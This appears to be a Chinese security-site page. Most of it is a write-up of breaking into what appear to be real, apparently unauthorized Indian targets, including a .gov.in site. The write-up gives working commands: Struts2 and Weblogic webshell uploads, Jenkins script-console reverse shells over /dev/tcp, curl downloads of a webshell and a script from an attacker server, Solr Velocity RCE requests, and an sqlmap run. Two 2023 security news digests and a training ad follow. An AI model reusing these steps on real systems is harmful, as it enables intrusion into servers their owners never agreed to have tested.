Struts2:
直接掏出大范围漏扫AWVS就行批量漏洞探测:
第一天数据就直接起飞,因为本次目标是==getshell==直接忽略中低危漏洞告警,查看高危漏洞:
很好一堆==Struts2==漏洞,直接上工具:
得到一个RCE(远程命令执行漏洞),远程写入==shell==,先利用工具生成一个==Antsword(蚁剑)jsp格式的shell==
将shell放到一个公网服务器上,接着执行命令查看web路径:/var/tomcat9/pmrportal/ROOT/
直接执行
curl -o /var/tomcat9/pmrportal/ROOT/shell.jsp http://u_ip/antsword.jsp
然后webshell工具Antsword连接即可:
爆出的该S2-045的漏洞的还有几个,getshell方式同上,不进行细述了___________。
Weblogic:
很好用的awvs,直接上工具注入内存马:
冰蝎连接webshell:
同类型的漏洞还有几个,getshell的方式都一致,不一一概述了》》
(PS:这个时候已经有些疲软了,没有去手测upload的点)
Jenkins:
中途其他框架没有收获的时候,就去浏览知识的海洋了,看到一个存在大量未授权+RCE的框架漏洞(Jenkins),二话不说,直接上FOFA:
(app="JENKINS" && title=="Dashboard [Jenkins]" && country="IN" && status_code="200") && (port="80" || port="443")
一看86条资产,有戏,数量不多,直接手测:
存在未授权,访问manager --> script页面,进行命令执行测试:
println "ls -al".execute().text
存在命令执行,尝试反弹shell:
println "bash -i >& /dev/tcp/ip/port 0<&1".execute().text
接收shell的服务器开启端口监听:
执行命令
发现没有shell反弹过来,猜测不能在web端执行反弹shell,于是将反弹shell的命令写入.sh文件中,然后执行,进行反弹shell操作:
在sh文件中写入如下内容:
bash -i >& /dev/tcp/ip/port 0<&1
保存在开放的web端口,在jenkins服务中执行如下curl命令远程下载sh文件:
println "curl - o /tmp/jenkins.sh http://u_ip:port/jenkins.sh".execute().text
查看.sh文件是否获取成功:
println "ls -al /tmp".execute().text
获取.sh文件成功,执行文件,反弹shell:
开启监听:
执行命令,启动.sh文件:
println "bash /tmp/jenkins.sh".execute().text
成功监听到谈过来的shell,又拿下一台!其他的没有存在未授权,便没有尝试。
Apache-Solr
闲着没事,打开文库看了几篇RCE复现,心血来潮,打开FOFA:
country="IN" && app="Apache-Solr" && status_code="200" && (port="443" || port="80")
数据不大,接着手测,拿到三个未授权(不需要登陆):
==授权==:
==未授权==:
拿到未授权之后,进行CVE探测:
访问/solr/admin/cores/,获取name => music
接着拼接路径/solr/music/config/查看用户配置信息:
都为true,可直接利用公网披露的payload进行RCE,
GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22whoam
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
测试是否出网:
修改执行命令为
curl%20xtolsc.dnslog.cn
可出网,直接反弹shell:
GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22bash%
Host: ip
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
VPS开启端口监听:nc -lvvnp 5000
接听到弹过来的shell了,好,又拿下一台,root权限。
其他漏洞发现
反射型XSS
具体测试过程均无任何难度,无须bypass黑名单之类的,测试语句
<script>alert(1)</script>
SQL注入
这类没有具体测试,发现注入点之后直接上SQLmap开扫:
sqlmap https://******.gov.in/****/Validate.jsp --data "email=a@a.com&password=123456" --random-agent -t 10 -p password --proxy=http://127.0.0.1:7890 --dbms=mysql
诸如其他的漏洞也有发现,但不是本次渗透的重点,便没重点去深入。
渗透总结
本次测试周期长,测试目标暴露点多,非常有趣的一次渗透实战,后期有其他事儿,就没法全身心投入,蛮可惜的。
网络安全日报 2023年08月10日
1、Sandworm组织试图入侵乌克兰军方作战数据交换系统
https://ssu.gov.ua/uploads/documents/2023/08/08/tekhnichniy-zvit-3.pdf Sandworm组织为俄罗斯军事情报部门背景的APT组织。该组织试图侵入用于规划武装部队行动的电子系统,此次行动被乌克兰安全人员发现并阻止,Sandworm组织尝试获取有关武装部队行动、国防军位置和行动、其技术支持等的敏感信息。研究人员发现近十个针对系统进行窃密的恶意间谍软件程序。
2、微软Visual Studio Code存在漏洞可被利用以窃取密码
https://cycode.com/blog/exposing-vscode-secrets/ 微软的 Visual Studio Code (VS Code) 代码编辑器和开发环境存在一个漏洞,允许恶意扩展检索存储在 Windows、Linux 和 macOS 凭据管理器中的身份验证令牌。这些令牌用于与各种第三方服务和 API(例如 Git、GitHub 和其他编码平台)集成,因此窃取它们可能会对受损组织的数据安全造成严重后果,可能导致未经授权的系统访问、数据泄露、 ETC。
3、国际刑警组织将16shop网络钓鱼即服务平台关闭
https://www.group-ib.com/media-center/press-releases/interpol-16shop/ 国际刑警组织和网络安全公司之间的联合行动逮捕并关闭了臭名昭著的 16shop 网络钓鱼即服务 (PhaaS) 平台。网络钓鱼即服务平台为网络犯罪分子提供了进行网络钓鱼攻击的一站式服务。这些平台通常包含您需要的一切,包括电子邮件分发、知名品牌的现成网络钓鱼工具包、托管、数据代理、受害者概览仪表板以及其他有助于提高运营成功率的工具。这些平台存在重大风险,因为它们降低了缺乏经验的网络犯罪分子的进入门槛,为他们提供了一种简单且经济高效的方式,只需点击几下即可发起
4、EvilProxy用于大规模云帐户接管计划
https://securityaffairs.com/149348/hacking/cloud-account-takeover-scheme-evilproxy.html 利用 EvilProxy 的云帐户接管计划袭击了全球组织的 100 多名高层管理人员 ,EvilProxy 被发现向 100 多个组织发送了 120,000 封网络钓鱼电子邮件,以窃取 Microsoft 365 帐户。
5、英特尔CPU侧通道攻击暴露敏感数据
https://securityaffairs.com/149326/hacking/downfall-intel-cpu-side-channel-attack.html 谷歌研究员 Daniel Moghimi 设计了一种新的英特尔 CPU 侧通道攻击技术,名为 Downfall,该技术依赖于一个被追踪为CVE-2022-40982 的漏洞。攻击者可以利用此漏洞访问和窃取共享同一系统的其他用户的数据。恶意软件可以执行 Downfall 攻击来窃取密码、加密密钥等敏感信息以及银行详细信息、个人电子邮件和消息等私人数据。
6、Western Digital、Synology NAS 漏洞暴露数百万用户文件
https://www.securityweek.com/western-digital-synology-nas-vulnerabilities-exposed-millions-of-users-files/ WD 和 Synology NAS 设备中发现的严重漏洞可能会泄露数百万用户的文件。
7、新报告揭露 Vice Society 与 Rhysida 勒索软件的合作
https://thehackernews.com/2023/08/new-report-exposes-vice-societys.html 双重勒索勒索软件组织Rhysida和Vice Society之间发现了战术上的相似之处,包括针对教育和医疗保健行业。
8、Android 14 引入了新的安全措施,允许禁用2G
https://security.googleblog.com/2023/08/android-14-introduces-first-of-its-kind.html Android 14 引入了新的安全措施来降低与 2G 网络相关的风险,允许用户和企业禁用 2G 连接并防止潜在的攻击。
9、AMD Zen CPU皆中招,新型Inception攻击能从中泄露敏感数据
https://www.freebuf.com/news/374277.html 苏黎世联邦理工学院的研究人员发现了一种新型瞬态执行攻击,能在所有型号的 AMD Zen CPU上执行特定命令并泄露敏感数据。通过此种 Inception攻击实现的数据泄露速率为每秒39 字节,窃取 16 个字符的密码大约需要半秒,窃取 RSA 密钥需要 6.5 秒。
10、Clop勒索软件提供种子以用于访问MOVEit攻击中被盗的数据
https://www.infosecurity-magazine.com/news/clop-gang-offers-data-downloads/ 安全研究员多米尼克·阿尔维耶里(Dominic Alvieri)在Twitter上透露了这一消息,截图显示了几名大牌受害者,他们的数据正在通过P2P共享提供。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年08月09日
1、微软周二补丁日修复了 2 个被主动利用的漏洞
https://securityaffairs.com/149299/security/microsoft-patch-tuesday-august-2023.html Microsoft 2023 年 8 月星期二补丁安全更新解决了 74 个漏洞,其中包括两个被积极利用的漏洞。
2、英国选举委员会披露数据泄露事件
https://securityaffairs.com/149288/data-breach/uk-electoral-commission-data-breach.html 英国选举委员会在 2014 年至 2022 年间遭受了一次数据泄露,暴露了选民的个人信息。
3、FBI 警告骗子冒充 NFT 开发人员进行欺诈
https://securityaffairs.com/149251/cyber-crime/fbi-nft-scam.html FBI 警告网络犯罪分子冒充 NFT 开发商窃取加密货币和其他数字资产。
4、黑客滥用 Cloudflare 隧道进行秘密通信
https://thehackernews.com/2023/08/hackers-abusing-cloudflare-tunnels-for.html 新研究表明,威胁行为者正在滥用 Cloudflare Tunnels,从受感染的主机建立隐蔽通信通道并保留持久访问权限。
5、新的 Yashma 勒索软件变种针对多个英语国家和中国
https://thehackernews.com/2023/08/new-yashma-ransomware-variant-targets.html 至少自 2023 年 6 月 4 日起,未知威胁行为者正在使用 Yashma 勒索软件的变体来针对英语国家、保加利亚、中国和越南的各个实体。
6、大规模网络钓鱼活动使用 800 多个诈骗域名冒充 340 家公司
https://www.imperva.com/blog/analysis-of-a-phishing-campaign 该网络钓鱼活动源自俄罗斯,但冒充乌克兰人,利用高质量的单页应用程序创建令人信服的网站并窃取信用卡和银行详细信息。
7、研究人员披露针对OpenBullet工具的恶意软件活动
https://www.kasada.io/threat-intel-openbullet-malware/ 研究人员发现了一项针对 OpenBullet 用户的恶意软件活动,OpenBullet 是犯罪社区中流行的一种用于进行撞库攻击的工具,这些社区内共享多个恶意 OpenBullet 配置文件,导致在用户计算机上安装远程访问特洛伊木马 (RAT)。OpenBullet 是一个合法的开源渗透测试工具,旨在自动执行网络安全专业人员执行的重复任务,以帮助确保网站和网络应用程序的安全。
8、Clop勒索软件组织利用MOVEit漏洞窃取800万人的医疗档案
https://www.theregister.com/2023/07/27/maximus_deloitte_moveit_hack/ 俄罗斯勒索软件团队 Clop 声称利用 MOVEit 漏洞攻击了会计公司、披萨和生日派对连锁店和政府承包商。在向美国证券交易委员会提交的文件中,负责管理医疗补助和医疗保险等美国政府项目的 Maximus 透露,Clop勒索组织窃取了一些文件。Maximus 公司认为这些文件包含至少 8 至 1100 万人的个人信息,包括社会安全号码、受保护的健康信息和/或其他个人信息。
9、研究人员披露为了部署DarkGate恶意软件的钓鱼活动
https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/ 研究人员发现了一个使用劫持电子邮件线程进行网络钓鱼的全球活动,该活动会导致下载名为 DarkGate 的复杂恶意软件。下载恶意软件的用户会收到一个 MSI 文件,其中包含两个嵌入文件,其中包含用于执行的编码 shellcode。DarkGate 还对两个嵌入字符串使用独特的解码,揭示发送到 C2 的命令和恶意软件的配置。在 DarkGate 的网络活动中观察到了循环 XOR 和自定义 Base64 解码等混淆技术。
10、涉“违规泄露客户信息”等6项违法违规,中行被罚210万
https://www.freebuf.com/news/374201.html 《银行科技研究社》消息:国家金融监督管理总局7月18日发布的行政处罚信息显示,中行嘉兴分行存在6项主要违法违规行为,其中包括“违规泄露客户信息”等,依据《中华人民共和国银行业监督管理法》第四十六条第五项、第四十八条第二项,《中华人民共和国商业银行法》第七十三条第三项,被原银保监会嘉兴监管分局处以罚款210万元。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

